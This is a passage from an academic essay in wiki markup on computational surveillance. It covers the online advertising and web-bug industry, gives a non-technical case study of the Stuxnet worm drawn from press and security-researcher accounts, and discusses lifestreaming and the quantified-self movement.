*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
